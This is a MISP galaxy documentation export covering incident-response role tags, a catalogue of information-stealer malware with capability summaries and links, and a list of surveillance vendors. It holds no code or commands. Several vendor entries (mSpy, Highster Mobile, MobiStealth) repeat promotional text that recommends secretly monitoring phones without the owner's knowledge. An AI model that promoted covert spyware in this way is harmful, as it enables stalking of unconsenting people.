Admitting and assessing the evidence - Judiciary - [R]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [R]"

Admitting and assessing the evidence - Judiciary - [C]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [C]"

Admitting and assessing the evidence - Judiciary - [I]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [I]"

Admitting and assessing the evidence - Judiciary - [S]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [S]"

Admitting and assessing the evidence - Prosecutors - [R]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [R]"

Admitting and assessing the evidence - Prosecutors - [C]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [C]"

Admitting and assessing the evidence - Prosecutors - [I]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [I]"

Admitting and assessing the evidence - Prosecutors - [S]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [S]"

Judging who committed a crime - Judiciary - [R]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [R]"

Judging who committed a crime - Judiciary - [C]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [C]"

Judging who committed a crime - Judiciary - [I]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [I]"

Judging who committed a crime - Judiciary - [S]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [S]"

Assessing incident damage and cost - CSIRT - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [R]"

Assessing incident damage and cost - CSIRT - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [C]"

Assessing incident damage and cost - CSIRT - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [I]"

Assessing incident damage and cost - CSIRT - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [S]"

Assessing incident damage and cost - LEA - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [R]"

Assessing incident damage and cost - LEA - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [C]"

Assessing incident damage and cost - LEA - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [I]"

Assessing incident damage and cost - LEA - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [S]"

Assessing incident damage and cost - Judiciary - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [R]"

Assessing incident damage and cost - Judiciary - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [C]"

Assessing incident damage and cost - Judiciary - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [I]"

Assessing incident damage and cost - Judiciary - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [S]"

Assessing incident damage and cost - Prosecutors - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [R]"

Assessing incident damage and cost - Prosecutors - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [C]"

Assessing incident damage and cost - Prosecutors - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [I]"

Assessing incident damage and cost - Prosecutors - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [S]"

Reviewing the response and update policies and procedures - CSIRT - [R]

Knowledge of how to draft incident response policies and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [R]"

Reviewing the response and update policies and procedures - CSIRT - [C]

Knowledge of how to draft incident response policies and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [C]"

Reviewing the response and update policies and procedures - CSIRT - [I]

Knowledge of how to draft incident response policies and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [I]"

Reviewing the response and update policies and procedures - CSIRT - [S]

Knowledge of how to draft incident response policies and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [S]"

Stealer

A list of malware stealers.

Stealer is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

raw-data

Nocturnal Stealer

It is designed to steal data found within multiple Chromium- and Firefox-based browsers; it can also steal many popular cryptocurrency wallets as well as any saved FTP passwords within FileZilla. Nocturnal Stealer uses several anti-VM and anti-analysis techniques, which include but are not limited to: environment fingerprinting, checking for debuggers and analyzers, searching for known virtual machine registry keys, and checking for emulation software.

The tag is: misp-galaxy:stealer="Nocturnal Stealer"

Nocturnal Stealer has relationships with:

  • similar: misp-galaxy:malpedia="Nocturnal Stealer" with estimative-language:likelihood-probability="likely"

Table 11696. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

https://www.bleepingcomputer.com/news/security/hookads-malvertising-installing-malware-via-the-fallout-exploit-kit/

https://traffic.moe/2018/11/10/index.html

TeleGrab

The first version stole browser credentials and cookies, along with all text files it can find on the system. The second variant added the ability to collect Telegram’s desktop cache and key files, as well as login information for the video game storefront Steam.

The tag is: misp-galaxy:stealer="TeleGrab"

Table 11697. Table References

Links

https://blog.talosintelligence.com/2018/05/telegrab.html

AZORult

It is able to steal accounts from different software, such as Firefox passwords, Internet Explorer/Edge, Thunderbird, Chrome/Chromium and many more. It is also able to (1) list all installed software, (2) list processes, (3) get information about the machine (name, CPU type, graphics card, memory size), (4) take screen captures, (5) steal cryptocurrency wallets from Electrum, MultiBit, monero-project, bitcoin-qt.

The tag is: misp-galaxy:stealer="AZORult"

Table 11698. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan

https://blog.minerva-labs.com/analyzing-an-azorult-attack-evasion-in-a-cloak-of-multiple-layers

https://malware.lu/articles/2018/05/04/azorult-stealer.html

Vidar

Vidar is a fork of the Arkei stealer. It appears to be one of the first stealers that grabs information from 2FA software and the Tor Browser.

The tag is: misp-galaxy:stealer="Vidar"

Table 11699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Ave Maria

Information stealer which uses AutoIT for wrapping.

The tag is: misp-galaxy:stealer="Ave Maria"

Table 11700. Table References

Links

https://blog.yoroi.company/research/the-ave_maria-malware/

HackBoss

A cryptocurrency-stealing malware distributed through Telegram.

The tag is: misp-galaxy:stealer="HackBoss"

Table 11701. Table References

Links

https://decoded.avast.io/romanalinkeova/hackboss-a-cryptocurrency-stealing-malware-distributed-through-telegram/

https://github.com/avast/ioc/tree/master/HackBoss

Prynt Stealer

Prynt Stealer is an information stealer that has the ability to capture credentials that are stored on a compromised system including web browsers, VPN/FTP clients, as well as messaging and gaming applications. Its developer based the malware code on open source projects including AsyncRAT and StormKitty. Prynt Stealer uses Telegram to exfiltrate data that is stolen from victims. Its author added a backdoor Telegram channel to collect the information stolen by other criminals.

The tag is: misp-galaxy:stealer="Prynt Stealer"

Prynt Stealer has relationships with:

  • variant-of: misp-galaxy:stealer="DarkEye" with estimative-language:likelihood-probability="very-likely"

  • variant-of: misp-galaxy:stealer="WorldWind" with estimative-language:likelihood-probability="very-likely"

Table 11702. Table References

Links

https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

DarkEye

Nearly identical to Prynt Stealer with a few differences. DarkEye is not sold or mentioned publicly, however, it is bundled as a backdoor with a “free” Prynt Stealer builder.

The tag is: misp-galaxy:stealer="DarkEye"

DarkEye has relationships with:

  • variant-of: misp-galaxy:stealer="Prynt Stealer" with estimative-language:likelihood-probability="very-likely"

  • variant-of: misp-galaxy:stealer="WorldWind" with estimative-language:likelihood-probability="very-likely"

Table 11703. Table References

Links

https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

WorldWind

Prynt Stealer variant that appears to be written by the same author. It is nearly identical to Prynt Stealer with a few minor differences. While Prynt Stealer is the most popular brand name for selling the malware, WorldWind payloads are the most commonly observed in the wild.

The tag is: misp-galaxy:stealer="WorldWind"

WorldWind has relationships with:

  • variant-of: misp-galaxy:stealer="Prynt Stealer" with estimative-language:likelihood-probability="very-likely"

  • variant-of: misp-galaxy:stealer="DarkEye" with estimative-language:likelihood-probability="very-likely"

Table 11704. Table References

Links

https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

DarkCloud Stealer

Stealer written in Visual Basic.

The tag is: misp-galaxy:stealer="DarkCloud Stealer"

DarkCloud Stealer has relationships with:

  • variant-of: misp-galaxy:malpedia="BluStealer" with estimative-language:likelihood-probability="very-likely"

Table 11705. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/

Album Stealer

The Zscaler ThreatLabz research team has spotted a new information stealer named Album. Album Stealer is disguised as a photo album that drops decoy adult images while performing malicious activity in the background. The threat group launching these attacks may be located in Vietnam.

The tag is: misp-galaxy:stealer="Album Stealer"

Table 11706. Table References

Links

https://www.zscaler.com/blogs/security-research/album-stealer-targets-facebook-adult-only-content-seekers

Rhadamanthys

According to PCrisk, Rhadamanthys is stealer-type malware and, as its name implies, is designed to extract data from infected machines.

The tag is: misp-galaxy:stealer="Rhadamanthys"

Table 11707. Table References

Links

https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88

https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/

https://www.malware-traffic-analysis.net/2023/01/03/index.html

https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/

Sordeal-Stealer

Python-based stealer targeting Discord, Steam…

The tag is: misp-galaxy:stealer="Sordeal-Stealer"

Sordeal-Stealer is also known as:

  • Sordeal

  • Sordeal Stealer

Table 11708. Table References

Links

https://github.com/SOrdeal/Sordeal-Stealer

Mars Stealer

Mars Stealer is an improved successor of Oski Stealer; it steals from current browsers and targets cryptocurrency wallets and 2FA plugins. Mars Stealer is written in ASM/C using the Windows API and weighs 95 kb. It uses special techniques to hide WinAPI calls, encrypts strings, collects information in memory, supports a secure SSL connection to its C&C, and does not use the CRT or STD.

The tag is: misp-galaxy:stealer="Mars Stealer"

Mars Stealer has relationships with:

  • successor-of: misp-galaxy:stealer="Oski Stealer" with estimative-language:likelihood-probability="very-likely"

Table 11709. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer

https://3xp0rt.com/posts/mars-stealer/

https://cyberint.com/blog/research/mars-stealer/

https://isc.sans.edu/diary/rss/28468

https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468

https://blog.morphisec.com/threat-research-mars-stealer

https://cert.gov.ua/article/38606

https://www.malwarebytes.com/blog/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique

https://blog.sekoia.io/mars-a-red-hot-information-stealer/

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer

https://resources.infosecinstitute.com/topics/malware-analysis/mars-stealer-malware-analysis/

https://www.microsoft.com/en-us/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer

https://x-junior.github.io/malware%20analysis/2022/05/19/MarsStealer.html

https://www.kelacyber.com/information-stealers-a-new-landscape/

https://cyble.com/blog/fake-atomic-wallet-website-distributing-mars-stealer/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view

https://threatmon.io/mars-stealer-malware-analysis-2022/

https://threatmon.io/storage/mars-stealer-malware-analysis-2022.pdf

https://3xp0rt.com/posts/mars-stealer/forum.png

WARPWIRE

WARPWIRE is a JavaScript-based credential stealer.

The tag is: misp-galaxy:stealer="WARPWIRE"

Table 11711. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

Surveillance Vendor

List of vendors selling surveillance technologies including malware, interception devices or computer exploitation services.

Surveillance Vendor is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Kape Technologies

Kape Technologies is better known by the name under which it was formerly incorporated, "Crossrider", but make no mistake: it is the same company that became notorious as an adware/malware producer. Kape Technologies was originally known as Crossrider until the name change in 2018. The reason for that was, as CEO Ido Erlichman put it, a “strong association to the past activities of the company.” Perhaps that refers to infecting users’ devices with malware and adware, considered “high-risk” by Symantec and Malwarebytes. If that wasn’t enough, Crossrider’s founder and first CEO, Koby Menachemi, was part of Unit 8200, something that can be called Israel’s NSA. Another key person, Teddy Sagi, who is the main investor in both Crossrider and Kape Technologies, is mentioned in the Panama Papers.

The tag is: misp-galaxy:surveillance-vendor="Kape Technologies"

Kape Technologies is also known as:

  • Kape

  • Crossrider

Table 11712. Table References

Links

https://telegra.ph/Private-Internet-Access-VPN-acquired-by-malware-business-founded-by-former-Israeli-spies-12-01

NSO group

NSO Group Technologies is an Israeli technology firm known for its Pegasus spyware enabling the remote surveillance of smartphones. It was founded in 2010 by Niv Carmi, Omri Lavie, and Shalev Hulio. It reportedly employed almost 500 people as of 2017, and is based in Herzliya, near Tel Aviv.

The tag is: misp-galaxy:surveillance-vendor="NSO group"

NSO group is also known as:

  • Q-Cyber

  • Circles

Table 11713. Table References

Links

https://en.wikipedia.org/wiki/NSO_Group

Hacking Team

HackingTeam is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations. Its "Remote Control Systems" enable governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and cameras on target computers. The company has been criticized for providing these capabilities to governments with poor human rights records, though HackingTeam states that it has the ability to disable its software if it is used unethically. The Italian government has restricted its license to do business with countries outside Europe. HackingTeam employs around 40 people in its Italian office, and has subsidiary branches in Annapolis, Washington, D.C., and Singapore. Its products are in use in dozens of countries across six continents.

The tag is: misp-galaxy:surveillance-vendor="Hacking Team"

Hacking Team is also known as:

  • Memento Labs

Table 11714. Table References

Links

https://en.wikipedia.org/wiki/Hacking_Team

Gamma Group

Gamma Group is an Anglo-German technology company that sells surveillance software to governments and police forces around the world. The company has been strongly criticised by human rights organisations for selling its FinFisher software to undemocratic regimes such as Egypt and Bahrain.

The tag is: misp-galaxy:surveillance-vendor="Gamma Group"

Gamma Group is also known as:

  • Gamma International

Table 11715. Table References

Links

https://en.wikipedia.org/wiki/Gamma_Group

FlexiSPY

Flexispy is a Symbian-based application that can be considered a trojan. The program sends all information received and sent by the smartphone to a Flexispy server. It was originally created to protect children and to spy on adulterous spouses.

The tag is: misp-galaxy:surveillance-vendor="FlexiSPY"

mSpy

mSpy is probably the most popular monitoring software on the market today. It is designed for parents who want to track their children’s online activity. Using mSpy is easy — just download and install a hidden app on your child’s phone and let it do its thing in the background. mSpy is available for iOS and Android, and has a web-based control panel that allows you to remotely monitor activity on your child’s device, including texts, instant messages, phone calls and social media use on Snapchat or Facebook. It also allows you to track the location of your child’s device on a map. The best thing about mSpy is that it works on non-jailbroken iPhones. Do note that some of its features, including email tracking and instant messenger monitoring, are only available on a rooted Android smartphone. If you don’t know how to root an Android device, you might want to consider using a spy app like Highster Mobile. This app lets you spy on an Android phone without rooting.

The tag is: misp-galaxy:surveillance-vendor="mSpy"

Table 11716. Table References

Links

https://www.bestphonespy.com/mspy-review/

Highster Mobile

Highster Mobile is a cell phone spy and monitoring software that allows you to secretly monitor your children, employees, or loved ones without them ever knowing it. The app is available for both Android and iOS devices and is developed by ILF Mobile Apps, a company based in Bohemia, New York, that specializes in mobile security.

The tag is: misp-galaxy:surveillance-vendor="Highster Mobile"

Table 11717. Table References

Links

https://www.bestphonespy.com/highster-mobile-review/

Mobile Spy

Mobile Spy is a cell phone monitoring application for iOS, Android and BlackBerry developed by Retina-X Studios. It allows you to monitor the smartphone activity of your children. You’ll be able to see text messages, track GPS locations, monitor social media activities, view call details and more inside a secure online account. Monitoring made easy. Log in anytime you wish from any location to see the recorded data without needing access to the monitored phone. The hidden version of Mobile Spy is no longer available due to legal issues.

The tag is: misp-galaxy:surveillance-vendor="Mobile Spy"

Table 11718. Table References

Links

https://www.bestphonespy.com/mobile-spy-review/

Hoverwatch

Hoverwatch is a computer and mobile monitoring software developed by Refog. It is available for Android, Windows and macOS. It runs silently in the background, recording all activities performed by the user such as messages sent and received, phone calls made and received, web sites visited, and every keystroke typed. All recorded data is sent to an online account.

The tag is: misp-galaxy:surveillance-vendor="Hoverwatch"

Table 11719. Table References

Links

https://www.bestphonespy.com/hoverwatch-review/

MobiStealth

MobiStealth is a popular spy software that comes with a simple web-based console and powerful monitoring features. It is developed by Infoweise Pty Ltd, a private company headquartered in Sydney, Australia. They have been making high quality monitoring solutions since 2009. In November 2015, they launched a “Non-Jailbreak” feature, letting users spy on all iOS devices without needing to jailbreak them. Like much other spy software, MobiStealth allows you to spy on a cell phone or computer via a web interface called StealthClub. As its name implies, it is a stealth application that runs in the background without the owner’s knowledge.

The tag is: misp-galaxy:surveillance-vendor="MobiStealth"

Table 11720. Table References

Links

https://www.bestphonespy.com/mobistealth-review/

Spyera

Spyera develops and sells computer and mobile spy software. Based in Hong Kong, Spyera’s products work in all languages and all countries. The company’s phone and PC monitoring products are useful tools for any parent or company, although they are quite expensive in comparison to other products. Spyera comes in three different versions — a mobile version for iPhone and Android smartphones, a tablet version for iPad and Android tablets, and a desktop version for Mac and Windows. The mobile version of Spyera is actually very similar to the FlexiSPY Extreme, which I reviewed a few weeks ago. It has everything you’d expect from a cell phone spy software: live call listening, call recording, and location tracking.

The tag is: misp-galaxy:surveillance-vendor="Spyera"

Table 11721. Table References

Links

https://www.bestphonespy.com/spyera-review/

StealthGenie

StealthGenie is a powerful cell phone spy software created by InvoCode Ltd in 2010 that can be used to spy on cheating spouses and monitor children’s activities. In September 2014, Hammad Akbar, founder of StealthGenie, was arrested in Los Angeles and charged with selling mobile device spyware. StealthGenie was officially discontinued on 26 September 2014.

The tag is: misp-galaxy:surveillance-vendor="StealthGenie"

Table 11722. Table References

Links

https://www.bestphonespy.com/stealthgenie-review/

SpyBubble

SpyBubble is a spy app that lets you secretly spy on someone’s phone. This spy app is compatible with a variety of mobile devices, including iPhone, Android, BlackBerry and Symbian, and it offers logging features for most cell phone activity. SpyBubble doesn’t provide the blocking and restricting features that you will find in several similar applications. However, it has many useful features, and its monitoring features are excellent. SpyBubble cell phone spy software was discontinued due to legal reasons.

The tag is: misp-galaxy:surveillance-vendor="SpyBubble"

Table 11723. Table References

Links

https://www.bestphonespy.com/spybubble-review/

Cytrox

Cytrox’s Israeli companies were founded in 2017 as Cytrox EMEA Ltd. and Cytrox Software Ltd. Perhaps taking a page from Candiru’s corporate obfuscation playbook, both of those companies were renamed in 2019 to Balinese Ltd. and Peterbald Ltd., respectively. We also observed one entity in Hungary, Cytrox Holdings Zrt, which was also formed in 2017.

The tag is: misp-galaxy:surveillance-vendor="Cytrox"

Cytrox is also known as:

  • Cytrox EMEA Ltd.

  • Cytrox Software Ltd.

  • Balinese Ltd.

  • Peterbald Ltd.

  • Cytrox Holdings Zrt

Cytrox has relationships with:

  • is-acquired-by: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Senpai" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Nexa" with estimative-language:likelihood-probability="likely"

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

Table 11724. Table References

Links

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/

RCSLab

RCS Lab S.p.A. is an Italian vendor, likely using Tykelab Srl as a front company.

The tag is: misp-galaxy:surveillance-vendor="RCSLab"

RCSLab is also known as:

  • RCS Lab

Table 11725. Table References

Links

https://www.rcslab.it/en/index.html

https://www.lookout.com/blog/hermit-spyware-discovery

https://www.vice.com/en/article/nz75wd/european-surveillance-companies-agt-rcs-sell-syria-tools-of-oppression

Aglaya

Aglaya, a contractor based in Delhi, India, emerged into the public eye in 2014 following its attempt to secure a substantial annual contract worth $5 billion. This surge in prominence was largely driven by the actions of Ankur Srivastava, Aglaya’s CEO and founder, who purportedly proposed the outsourcing of surveillance and hacking services to various governments.

The tag is: misp-galaxy:surveillance-vendor="Aglaya"

Table 11726. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/59weqb/a-spyware-company-audaciously-offers-cyber-nukes

Interionet

Interionet Systems Ltd., headquartered in Herzliya, Israel, is a privately-held company recognized for its approach in the cyber intelligence domain, particularly catering to law enforcement and intelligence agencies. The firm, founded by ex-NSO team members, is dedicated to the development of sophisticated cyber-intrusion and mobile interception tools.

The tag is: misp-galaxy:surveillance-vendor="Interionet"

Table 11727. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.intelligenceonline.com/surveillance--interception/2019/05/14/interionet-former-nso-team-s-new-offensive-cyber-firm,108357090-art

https://www.interionet.com/

Intellexa

The Intellexa alliance is an evolving group of companies and brands that have been involved in developing and marketing a wide range of surveillance products including advanced spyware, mass surveillance platforms, and tactical systems for targeting and intercepting nearby devices. The corporate entities of the alliance span various jurisdictions, both within and outside the EU. The exact nature of links between these companies is shrouded in secrecy as corporate entities, and the structures between them, are constantly morphing, renaming, rebranding, and evolving.

The tag is: misp-galaxy:surveillance-vendor="Intellexa"

Intellexa has relationships with:

  • known-as: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

Table 11728. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://securitylab.amnesty.org/latest/2023/10/technical-deep-dive-into-intellexa-alliance-surveillance-products/

https://www.spiegel.de/international/business/the-predator-files-european-spyware-consortium-supplied-despots-and-dictators-a-2fd8043f-c5c1-4b05-b5a6-e8f8b9949978

https://blog.google/threat-analysis-group/0-days-exploited-by-commercial-surveillance-vendor-in-egypt/

Merlinx / Equus Technologies

Merlinx / Equus Technologies is an Israeli privately held company specializing in the development of tailor-made innovative solutions for law enforcement, intelligence agencies, and national security organizations. It has been linked to Android malware and also sells iOS capabilities.

The tag is: misp-galaxy:surveillance-vendor="Merlinx / Equus Technologies"

Table 11729. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/evdebz/google-revealed-an-israeli-spyware-company-that-has-quietly-sold-its-wares-for-years

AQSACOM

AQSACOM is a French company providing lawful interception for IP networks. All Aqsacom’s security products can be combined in a powerful solution so that telecommunications and ISP operators can provide the authorities with a reliable and professional service.

The tag is: misp-galaxy:surveillance-vendor="AQSACOM"

Table 11730. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://aqsacom.com/

Area

Area Spa is a firm based near Milan that sells monitoring systems capable of capturing internet traffic, tapping conversations, and tracking targets through GPS.

The tag is: misp-galaxy:surveillance-vendor="Area"

Table 11731. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/gv5knx/italian-cops-raid-surveillance-tech-company-area-spa-selling-spy-gear-to-syria

https://www.area.it/en/

ClearTrail

ClearTrail Technologies is an India-based company known for developing and selling systems for monitoring the computers, mobile phones and emails of unsuspecting masses.

The tag is: misp-galaxy:surveillance-vendor="ClearTrail"

Table 11732. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.clear-trail.com/about-us/

https://www.business-standard.com/article/companies/the-two-men-behind-india-s-secret-surveillance-industry-111120300053_1.html

Elaman

Elaman is a German company that sells a wide array of surveillance technologies, from vast monitoring centres capable of monitoring thousands of conversations simultaneously to trojans that target specific individuals’ devices. They don’t create these products; they resell them from other surveillance companies. They have sold products from VASTech, Gamma, Utimaco and Nokia Siemens Networks. This catalogue gives an insight into one of the surveillance industry’s biggest middlemen.

The tag is: misp-galaxy:surveillance-vendor="Elaman"

Table 11733. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.elaman.de/

https://privacyinternational.org/blog/1540/elaman-and-gamma-whats-selling-and-whos-buying-indonesia

Gita Technologies

Gita Technologies is an Israel-based company with a mission to be a worldwide leader in research and development of high-end security systems and SIGINT.

The tag is: misp-galaxy:surveillance-vendor="Gita Technologies"

Table 11734. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://gitatechnologies.com/

Innova

Innova is based in Trieste, Italy, and is a frequent supplier of Italian prosecutors’ offices. It was the only Italian firm at the International Exhibition for National Security and Resilience (ISNR), which was held in Abu Dhabi in October 2022. The exhibition connects regional government agencies with manufacturers from around the world, and was organised in cooperation with the Ministry of the Interior and in strategic partnership with Abu Dhabi Police GHQ. The United Arab Emirates, however, is known for human rights violations, some of which were facilitated by the use of digital surveillance technology, as in the case of an iPhone spyware that was used against hundreds of activists, foreign leaders and suspected terrorists, according to Reuters. Innova’s foreign presence did not stop at ISNR. The company was also at ISS World Latin America, which took place in Panama in October 2022, and was among the sponsors of the September event of ISS World Asia Pacific 2022 in Singapore. These trade shows are not mere opportunities for display, but allow direct contact with members of intelligence agencies from various countries, law enforcement officials and government leaders or ministers.

The tag is: misp-galaxy:surveillance-vendor="Innova"

Table 11735. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://irpimedia.irpi.eu/en-italian-spyware-on-the-international-market/

Jenovice

Jenovice, an Israeli firm that flies under the radar, has invented a remotely-operated WiFi interception device that can facilitate spy missions. Jenovice Cyber Labs' Piranha exploits vulnerabilities in WiFi networks to connect an attacker to as many as 50 targeted devices at once.

The tag is: misp-galaxy:surveillance-vendor="Jenovice"

Table 11736. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://cyberscoop.com/jenovice-cyber-labs-metropolink-city-wide-surveillance/

https://www.jenovice.com/

Lumacron

Lumacron is a British startup developing interception tools to capture the massive data flows that transit through the principal international communications networks.

The tag is: misp-galaxy:surveillance-vendor="Lumacron"

Table 11737. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.intelligenceonline.com/surveillance--interception/2018/06/19/lumacron-extends-interception-to-undersea-cables,108314081-art

NeoSoft

NeoSoft AG is a Swiss manufacturer of Passive, Active (Semi-Active) and Hybrid GSM Monitoring systems with A5.2/A5.1 deciphering, CDMA Passive Monitoring systems, IMSI/IMEI Catchers 2G/3G, and the InPoint SMS System (sends SMS to everybody). All NeoSoft systems support the following bands: GSM, PCS, EGSM, 2100, 850. NeoSoft has world-wide experience.

The tag is: misp-galaxy:surveillance-vendor="NeoSoft"

Table 11738. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.burojansen.nl/pdf/ISSWorldEuropejune2011sponsorsfromwebsite.pdf

https://riskybiznews.substack.com/p/risky-biz-news-australia-passes-new

https://www.neosoft.ch/

Nexa

Nexa Technologies was indicted for complicity in acts of torture; the French firm is accused of having sold surveillance equipment to Egypt.

The tag is: misp-galaxy:surveillance-vendor="Nexa"

Nexa is also known as:

  • Nexa Technologies

Nexa has relationships with:

  • is-allied-with: misp-galaxy:surveillance-vendor="Senpai" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

Table 11739. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://securityaffairs.com/125083/intelligence/nexa-technologies-indicted.html

https://wearenexa.com/aboutus/

Norsi-Trans

Norsi-Trans produces SIGINT and lawful interception equipment and software for the Russian government and also sells an OSINT platform called Vitok-ROI (or Vitok-OSINT).

